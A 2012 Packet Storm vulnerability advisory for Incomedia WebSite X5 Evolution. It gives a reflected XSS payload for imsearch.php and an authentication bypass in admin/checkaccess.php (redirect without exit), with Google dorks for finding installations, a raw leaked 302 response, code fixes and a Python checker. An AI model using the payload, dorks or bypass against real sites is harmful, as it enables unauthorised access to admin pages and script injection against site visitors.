Incomedia WebSite X5 Evolution 9.0.4.1748 XSS / Bypass

Source: packetstormsecurity.com (PACKETSTORM:118367)
Author: Akastep
Published: Nov 26, 2012
=========================================
Vulnerable Software: Incomedia WebSite X5 Evolution <= 9.0.4.1748 (All versions)  
Vendor: www.websitex5.com  
Vulns: XSS && Auth Bypass  
Software License: Commercial  
Dork 1: inurl:imsearch.php  
Dork 2: intitle:WebSite X5 Manager inurl:/admin/header.php  
=========================================  
  
  
About Software:  
==========================================  
WebSite X5 Evolution 9 is the most versatile and complete solution you'll find  
for creating eye-catching, functional and professional websites, blogs and  
online stores.  
  
You'll be surprised at how easy WebSite X5 Evolution 9 is to use, but what is  
perhaps most amazing is the sheer power and totality of the features it offers.  
  
http://www.websitex5.com/en/evolution-9.html  
  
*Nice Software and easy to use.*  
==========================================  
  
About Vulnerabilities:  
  
  
  
[*] XSS: [*]  
site.tld/imsearch.php?search="\><script>alert(1);</script>  
  
  
  
Fix:  
  
Open imsearch.php and find:  
  
=============VULNERABLE CODE==============  
  
<?php  
$search = new imSearch();  
$search->search(@$_GET['search'], @$_GET['page']);  
?>  
  
  
==========END OF VULNERABLE CODE==========  
  
  
  
REPLACE WITH:


==============FIXED CODE====================

<?php
$search = new imSearch();
// HTML-encode the user-controlled values before they are reflected into the page.
// Caveat: htmlspecialchars() only encodes single quotes when ENT_QUOTES is passed
// (that became the default only in PHP 8.1), so add ENT_QUOTES and the page charset
// if the value can ever land inside a single-quoted attribute.
$search->search(htmlspecialchars(@$_GET['search']), htmlspecialchars(@$_GET['page']));
?>

===========END OF FIXED CODE================
  
  
  
  
[*] The second vulnerability is an authentication bypass. [*]
  
  
  
  
Vulnerable code: site.tld/admin/checkaccess.php  
  
========= BEGIN VULNERABLE CODE ===========  
  
  
<?php
require_once("../res/x5engine.php");
$login = new imPrivateArea();
if ($login->checkAccess("admin/" . basename($_SERVER['PHP_SELF'])) !== 0) {
    if (basename($_SERVER['HTTP_REFERER']) == "login.php")
        header("Location: login.php?error");
    else
        header("Location: login.php");
    // no exit here: execution falls through into the page that included this file
}
else
    $logged = TRUE;

// End of file checkaccess.php
  
==========END OF VULNERABLE CODE==========  
  
  
Note the flaw: after the Location header is sent the script does not exit, so execution continues and the protected page that included checkaccess.php is still rendered and sent to the unauthenticated client in the body of the 302 response.
  
  
  
To reproduce:
===============================================

Request any /admin/*.php page without a valid session and intercept the traffic from your browser with Fiddler (or use any client that does not follow redirects): the 302 response to login.php carries the full output of the script's execution in its body.
Print screen:  
http://oi47.tinypic.com/f21sf7.jpg  
  
==================== RAW=======================  
HTTP/1.1 302 Found  
Date: Sun, 25 Nov 2012 01:13:19 GMT  
Server: Apache  
Set-Cookie: ASPX=pfsnkn5ccps9u15pa0r4of6lodesg6lq; path=/  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Location: login.php  
Content-Length: 1188  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Content-Type: text/html  
  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it" dir="ltr">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
<meta http-equiv="Content-Language" content="it" />  
<meta http-equiv="Content-Type-Script" content="text/javascript" />  
<meta http-equiv="ImageToolbar" content="False" />  
<meta name="MSSmartTagsPreventParsing" content="True" />  
<script type="text/javascript" src="../res/jquery.js"></script>  
<script type="text/javascript" src="../res/x5engine.js"></script>  
<link rel="stylesheet" type="text/css" href="template.css" media="screen" />  
<title>WebSite X5 Manager</title>  
</head>  
<body>  
<div id="imAdminPage">  
<div id="imBody">  
<div class="imSectionTitle"></div>  
<div class="imContent">  
<div class="imTest pass">PHP version: 5.2.17<span>PASS</span></div>
<div class="imTest pass">Session support<span>PASS</span></div>
<div class="imTest pass">Path to the public folder on the server<span>PASS</span></div>
</div>  
</div>  
</div>  
</body>  
  
  
===============EOF RAW==================  
  
  
  
Because every page under /admin/ relies on checkaccess.php for its access control, until checkaccess.php is patched every file in /admin/*.php is affected: a client that ignores the redirect receives the page content.
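As an added example (not part of the original advisory and not Incomedia's code), the Python script below turns the two checks described above into something you can run against your own installation: it requests imsearch.php with the advisory's payload and reports whether the payload comes back unencoded, and it requests admin pages without a session, refuses to follow the redirect (as Fiddler does) and reports whether the 302 still carries a page body. The target host and the list of admin pages are assumptions; the embedded sample body is a trimmed copy of the Fiddler capture above, constructed here so the decision logic can be exercised offline.

```python
# Added example: offline-testable checks for the two conditions in the advisory.
# Not the advisory's or the vendor's code. Assumptions: the paths imsearch.php and
# admin/*.php named in the advisory; ADMIN_PAGES is a hypothetical probe list.
import html
import sys
import urllib.error
import urllib.parse
import urllib.request

# The advisory's XSS payload, exactly as it appears in the dorked URL.
XSS_PROBE = '"\\><script>alert(1);</script>'

# Admin pages to probe unauthenticated (hypothetical list; header.php is the
# file named in the advisory's second dork).
ADMIN_PAGES = ("header.php",)

# Constructed sample: the 302 body from the advisory's Fiddler capture, trimmed.
SAMPLE_LEAKED_BODY = """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>WebSite X5 Manager</title></head>
<body><div id="imAdminPage">
<div class="imTest pass">PHP version: 5.2.17<span>PASS</span></div>
</div></body></html>"""


def escaped_probe(probe: str = XSS_PROBE) -> str:
    """What a server that HTML-encodes the term sends back (mirrors PHP's
    htmlspecialchars with ENT_QUOTES, except that the single quote entity differs)."""
    return html.escape(probe)


def reflects_unescaped(body: str, probe: str = XSS_PROBE) -> bool:
    """True when the probe comes back byte-for-byte, i.e. without HTML encoding.
    An encoding server returns escaped_probe() instead, so the raw probe is absent."""
    return probe in body


def leaks_behind_redirect(status: int, headers: dict, body: str) -> bool:
    """True when a redirect to login.php still carries a full HTML page.
    This is the symptom of header("Location: ...") without exit: the 3xx is sent,
    but the script keeps running and the protected page follows in the body.
    A correctly patched checkaccess.php yields an empty 3xx body."""
    location = headers.get("Location", "")
    is_login_redirect = 300 <= status < 400 and "login.php" in location
    return is_login_redirect and "<html" in body.lower()


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Hand the 3xx back to us instead of following it (like Fiddler or curl -i)."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # None makes urllib raise HTTPError for the 3xx


def fetch(url: str):
    """Return (status, headers, body) without following redirects."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=10) as resp:
            return resp.status, dict(resp.headers), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:  # 3xx/4xx/5xx all arrive here
        return err.code, dict(err.headers), err.read().decode("utf-8", "replace")


def check_site(base: str) -> dict:
    """Probe one installation; returns {'xss': bool, 'bypass': [leaking admin pages]}."""
    base = base.rstrip("/") + "/"
    search_url = base + "imsearch.php?" + urllib.parse.urlencode({"search": XSS_PROBE})
    _, _, search_body = fetch(search_url)
    leaking = []
    for page in ADMIN_PAGES:
        status, headers, admin_body = fetch(base + "admin/" + page)
        if leaks_behind_redirect(status, headers, admin_body):
            leaking.append(page)
    return {"xss": reflects_unescaped(search_body), "bypass": leaking}


if __name__ == "__main__":
    # Usage: python check_x5.py http://site.tld/   (only against hosts you are authorised to test)
    print(check_site(sys.argv[1]))
```

Run it against a host you are authorised to test; after the imsearch.php and checkaccess.php fixes given in this advisory are applied, the XSS check should report False and the bypass list should be empty, because the 302 to login.php no longer carries a body.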
  
  
  
  
  
Fixed Code:  
site.tld/admin/checkaccess.php  
  
==============BEGIN =FIXED CODE=================  
<?php
require_once("../res/x5engine.php");
$login = new imPrivateArea();
if ($login->checkAccess("admin/" . basename($_SERVER['PHP_SELF'])) !== 0)
{
    if (basename($_SERVER['HTTP_REFERER']) == "login.php")
    {
        header("Location: login.php?error");
        exit;   // stop here so the protected page is never rendered
    }
    else
    {
        header("Location: login.php");
        exit;
    }
}
else
{
    $logged = TRUE;
}

// End of file checkaccess.php
  
===============END OF FIXED CODE================  
  
  
**Vendor notified about this advisory.**  
  
  
================================================  
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:  
================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
exploit-db.com  
osvdb.com  
websecurity.com.ua  
  
to all Aa Team + to all Azerbaijan Black HatZ  
+ *Especially to my bro CAMOUFL4G3 *  
To All Turkish Hackers  
  
Also special thanks to: ottoman38 & HERO_AZE  
================================================  
  
/AkaStep  